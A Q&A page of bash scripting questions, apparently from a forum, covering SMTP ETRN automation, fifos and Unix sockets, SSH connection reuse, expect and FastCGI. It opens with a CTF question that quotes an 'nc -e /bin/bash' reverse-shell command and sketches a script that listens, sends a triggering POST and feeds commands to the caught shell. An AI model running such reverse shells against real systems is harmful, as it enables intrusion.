I'm doing an exercise (basically just a CTF) where we exploit some vulnerable machines. For example, by sending a specially crafted POST request, we can make a machine execute something like
nc -e /bin/bash 10.0.0.2 2546
What I want to do is script my way out of this, to make it easier:
1. Set up a listener on a specific port
2. Send a POST request to make the machine connect back
3. Send arbitrary data to the server, e.g. to escalate privileges
4. Present the user with the shell (e.g. the one served through nc)
This is not a post about how to hack it or how to escalate privileges; it's just that my scripting capabilities (especially in bash!) are not the best.
The problem is when I reach step 2. For obvious reasons, I can't start nc -lvp 1234 before sending the POST request, since it blocks. And I'm fairly sure multithreading in bash is not possible (...somebody has probably managed it, though.)
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say that I actually succeed in getting a connection back home: how would I manage to send data from my script, through netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file, and using that as a "buffer"?
I know there are a lot of questions here, and they can't all be covered in one answer, but I'd like to hear how people would approach this, OR whether it's completely ridiculous to attempt in bash.
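For what it's worth, the backgrounded-listener approach in the snippet above can be made workable with a fifo acting as the "buffer" asked about. Below is a minimal sketch, not a definitive implementation: the network parts are simulated so the pattern itself runs anywhere (`cat` stands in for `nc`, and the curl POST is shown only as a comment).

```shell
#!/bin/bash
# Sketch of steps 1-3 with the network pieces simulated:
# `cat` stands in for `nc -lvp "$lp"`, and the curl POST is a comment.
fifo=$(mktemp -u)
outfile=$(mktemp)
mkfifo "$fifo"

# Step 1: listener in the background, fed from the fifo (the "buffer").
# Real version:  nc -lvp "$lp" < "$fifo" > "$outfile" &
cat < "$fifo" > "$outfile" &
listener_pid=$!

# Step 2: trigger the connect-back.
# Real version:  curl -X POST "$url" --data "in_command=do_dirty_stuff"

# Step 3: write setup commands into the fifo; they would reach the remote
# shell before the user takes over (step 4 is the interactive hand-off).
{ echo "id"; echo "whoami"; } > "$fifo"

wait "$listener_pid"
received=$(cat "$outfile")
echo "$received"
rm -f "$fifo" "$outfile"
```

The interactive hand-off in step 4 is the hard part in a real script; the simplest option is to run nc in the foreground once the setup commands have been written into the fifo.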
Related
Once in a while, I need to ETRN a couple of backup servers (e.g. after maintenance of my own SMTP server).
Normally, I use telnet for that: I connect to the server, HELO with my own name, and give the ETRN commands. I would like to automate that in a decent way. A simple (but not decent) way would be to feed telnet from a << here-document, but the problem is that I do not want to send commands out of order. The other end may even drop the connection if I do that; I haven't tested it yet, but even if it works now, it may stop working later, so I'd like a decent solution, not one that may break later. E.g., I want to wait for the 220 line from the remote SMTP server, then send my HELO, wait for the 250 reply, and only then send the various ETRN commands.
How do I do that in bash? Or do I need to use something else, such as Python?
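One bash-only pattern (a sketch, not a polished solution) is to open the connection as a coprocess and write a small helper that reads server lines until the expected reply code appears. Here a fake_server function stands in for the real SMTP connection so the sketch is self-contained; in real use you would replace the coproc body with an actual client (e.g. `nc backup-server 25`). Hostnames are placeholders.

```shell
#!/bin/bash
# Sketch: wait for each SMTP reply code before sending the next command.
fake_server() {
  echo "220 backup.example ESMTP"
  read -r _; echo "250 backup.example"
  read -r _; echo "250 OK, queue flushed"
}

coproc SMTP { fake_server; }
# Copy the coproc fds so they survive even after the coproc exits:
exec 3<&"${SMTP[0]}" 4>&"${SMTP[1]}"

replies=""
expect_code() {  # read server lines until one starts with the wanted code
  local want=$1 line
  while read -r line <&3; do
    echo "S: $line"
    replies+="$line"$'\n'
    [[ $line == "$want"* ]] && return 0
  done
  return 1
}

expect_code 220 || exit 1
echo "HELO my.host.example" >&4
expect_code 250 || exit 1
echo "ETRN example.com" >&4
expect_code 250 || exit 1
```

Duplicating the coprocess file descriptors with `exec` avoids the known bash gotcha where the SMTP array is unset as soon as the coprocess terminates.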
Okay, so I have two shell scripts, a server and a client, where the server is always run as root, and the clients can be run as standard users in order to communicate with the server.
The method I've chosen to do this is with a world-accessible directory containing named pipes (fifos), one of which is world-writable (to enable initial connection requests) and the others are created per-user and writable only by them (allowing my server script to know who sent a message).
This seems to work fine, but it feels like it may be over-engineered or missing a more suitable alternative. It also lacks any means of determining whether the server is currently running, besides searching for its name in the output of ps. This is somewhat problematic, as it means that writing to the connection fifo will hang if the server script isn't available to read from it.
Are there better ways to do something like this for a shell script? Of course I know I could use an actual program to get access to more capabilities, but this is really just intended to provide secure access to a root service for non-root users (i.e., it's a wrapper for something else).
You could use Unix domain sockets instead of fifos. Domain sockets can be created with nc -lU /path/to/wherever and connected to with nc -U /path/to/wherever. This creates a persistent object in the filesystem (like a fifo, but different). The server should be able to maintain multiple simultaneous connections over the same socket.
If you're willing to write in C (or some other "real" programming language), it's also possible to pass credentials over Unix domain sockets, unlike fifos. This makes it possible for the server to authenticate its clients without needing to rely on filesystem permissions or other indirect means. Unfortunately, I'm not aware of any widely-supported interface for doing this in a shell script.
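As for the hang the question mentions when no server is reading the connection fifo: independently of whether you keep fifos or move to sockets, you can bound the blocking write with timeout(1) and treat a timeout as "server not running". A minimal sketch (the fifo path is just a temp file for illustration):

```shell
#!/bin/bash
# Sketch: detect an absent server instead of hanging on a fifo write.
fifo=$(mktemp -u)
mkfifo "$fifo"

# No reader has the fifo open, so a plain `echo request > "$fifo"` would
# block forever. timeout(1) turns that into a detectable failure:
if timeout 1 bash -c "echo request > '$fifo'"; then
    status="up"
else
    status="down"
fi
echo "server status: $status"
rm -f "$fifo"
```

The same guard works for the socket approach: a failed `nc -U` connect returns promptly on its own, so there the liveness check comes for free.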
Okay, so I have a shell script for transferring some files to a remote host using rsync over ssh.
However, in addition to the transfer, I need to do some housekeeping beforehand and afterwards, which involves an additional ssh with a command, plus a call to scp to transfer some extra data not included in the rsync transfer (I generate this data while the transfer is taking place).
As you can imagine, this currently results in a lot of SSH sessions starting and stopping, especially since the housekeeping operations are actually very quick (usually). I've verified on the host that this shows up as lots of SSH connects and disconnects which, although minor compared to the actual transfer, seems pretty wasteful.
So what I'm wondering is: is there a way that I can just open an SSH connection and leave it connected until I'm done with it? I.e., my initial ssh housekeeping operation would leave its connection open so that when rsync (and afterwards scp) runs, it can just do its thing over that previously opened connection.
Is such a thing even possible in a shell script? If so, any pointers on how to handle errors (i.e., ensuring the connection is closed once it isn't needed) would be appreciated as well!
It's possible. The easiest way doesn't even require any programming. See https://unix.stackexchange.com/questions/48632/cant-share-an-ssh-connection-with-rsync - the general idea is to use SSH connection reuse to get your multiple SSHs to share one session, then get rsync to join in as well.
The hard way is to use libssh2 and program everything yourself. This will be a lot more work, and in your case it seems to have nothing to recommend it. For more complex scenarios, though, it can be useful.
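For reference, the connection-reuse setup from the linked answer boils down to a few ssh_config options. The host alias and values here are made up for illustration:

```
Host backup
    HostName remote.example.com
    ControlMaster auto
    ControlPath ~/.ssh/ctl-%r@%h:%p
    ControlPersist 10m
```

With this in place, the first `ssh backup` becomes the master, and subsequent ssh, scp, and rsync calls (rsync runs ssh underneath) share its connection. For the error-handling concern: `trap 'ssh -O exit backup' EXIT` near the top of the script tears the master down when the script finishes, and `ssh -O check backup` reports whether a master is currently up.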
I'm making a bash script to send commands to a launched program, and the only way I found on the internet was through named pipes.
Is there an easier way to do it all inside the same script? Named pipes have the problem that I need three scripts: one to manage the program, another to send the information from the main script, and a reader to pass the information on to the program (if I understood the above link correctly).
And that is a problem, as the manager has to call the others, because I need the reader to receive an array of files as input and I found no way of doing so; if you know how, please answer this other question.
Thank you
--- 26/01/2012 ---
After Carl's post I tried:
#!/bin/bash
MUS_DIR="/home/foo/dir/music"
/usr/bin/expect <<-_EOF_
spawn vlc --global-key-next n $MUS_DIR
sleep 5
send 'n'
sleep 5
send "n"
_EOF_
But it doesn't work: it just spawns vlc, and it doesn't skip the song.
You might want to check out expect(1).
More details about the program you want to communicate with would be useful.
Essentially you just need some sort of inter-process communication. Files/pipes/signals/sockets could be used. For example, write to a specific file in the script and then send a signal to the program so it knows to check the file.
Depending on your language of choice, and on how much time you can spend on this and how big the project will be, you could have the launched program use a thread to listen on a port for TCP connections and react to them. Then your bash script could netcat the information to it, or send an HTTP POST with curl.
Are you sure it's not possible for the application to be started by the script, allowing the script to just pass arguments or define some environment variables?
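The file-plus-signal idea from the answer above can be sketched in pure bash. Here the "launched program" is simulated by a background loop that re-reads a command file whenever it receives SIGUSR1; all names are made up for illustration:

```shell
#!/bin/bash
# Sketch: control a running background process via a file and a signal.
cmdfile=$(mktemp)
log=$(mktemp)

program() {
  # On SIGUSR1, re-read the command file (stand-in for the real program).
  trap 'echo "program got command: $(cat "$cmdfile")"' USR1
  while :; do sleep 0.1; done   # stand-in for the program's main loop
}

program > "$log" &
prog_pid=$!
sleep 0.3                        # give the trap time to be installed

echo "next-track" > "$cmdfile"   # write the command...
kill -USR1 "$prog_pid"           # ...then tell the program to look
sleep 0.5                        # let the handler run

result=$(cat "$log")
echo "$result"
kill "$prog_pid"
rm -f "$cmdfile" "$log"
```

This only works if you control the launched program's source, of course; for a closed program like vlc you are limited to whatever control interface it exposes (which is why the expect/named-pipe approaches come up).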
I would like to use FastCGI with shell scripts.
I have found several tutorials about writing CGI scripts in shell, but nothing about FastCGI, and I guess this is not the same thing.
Is it possible, and how?
Thank you
Edit: Ignacio: Thank you, but that link is 14 years old and says that this is not currently supported. Is it still unsupported?
The whole point of FastCGI is to avoid spawning a new process for each incoming connection. By the very nature of the language, a shell script will spawn many processes during its execution, unless you want to restrict yourself greatly (no cat, awk, sed, grep, etc., etc.). So from the start, if you're going to use a shell script, you may as well use regular CGI instead of FastCGI.
If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the web server. As far as I know, there is no UNIX tool that does this. Now, you could write one in some other language, and it could run your shell script once for each incoming connection. But this is exactly what normal CGI does, and I guarantee it does it better than the custom program you or I would write. So again, stick with normal CGI if you want to use a shell script.
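To make the "normal CGI" recommendation concrete, here is a minimal CGI shell script, together with a simulation of how the web server invokes it (environment variables in, HTTP response on stdout). The query-string value is made up for illustration:

```shell
#!/bin/bash
# Minimal CGI script in shell, written to a temp file so this example can
# invoke it the way a web server would.
cgi=$(mktemp)
cat > "$cgi" <<'EOF'
#!/bin/bash
printf 'Content-Type: text/plain\r\n\r\n'
echo "Query string: ${QUERY_STRING:-<none>}"
EOF

# Simulate the web server's calling convention:
response=$(QUERY_STRING="action=etrn" bash "$cgi")
echo "$response"
rm -f "$cgi"
```

A real deployment would just place the inner script in the server's cgi-bin directory; the server sets QUERY_STRING, REQUEST_METHOD, and the other CGI variables before running it.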
"If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the webserver. As far as I know, (...)" there is one C program doing nearly this: exec_with_piped.c
(it's using pipes, not sockets, but the C code should be easily adapted for your purpose)
Look at "Writing agents in sh: conversing through a pipe"
http://okmij.org/ftp/Communications.html
Kalou
No
I apologize in advance if this is a dumb question, but is it conceivable to use a mere shell script (sh or ksh) as a FastCGI program and, if so, how?
You cannot use a simple shell script as a FastCGI program. Since a shell script cannot persist across multiple HTTP requests, it cannot be used as a FastCGI application. For the program to handle multiple HTTP requests in its own lifetime (i.e. not just handle one request and die, like CGI applications do), it needs some means of communicating with the web server to receive a request and to send the reply back to the server after handling it. This communication is accomplished via the FCGI library, which implements the above and currently supports only a subset of programming languages, like C, Perl, Tcl, Java... In short, it does NOT support shell.
Hope that cleared it up a bit.
Stanley.
From http://www.fastcgi.com/:
FastCGI is simple because it is actually CGI with only a few extensions.
Also:
Like CGI, FastCGI is also language-independent.
So you can use FastCGI with shell scripts or any other kind of scripts, just like CGI.
Tutorials for CGI are useful to learn FastCGI too, except maybe for the particularities of setting up the web server.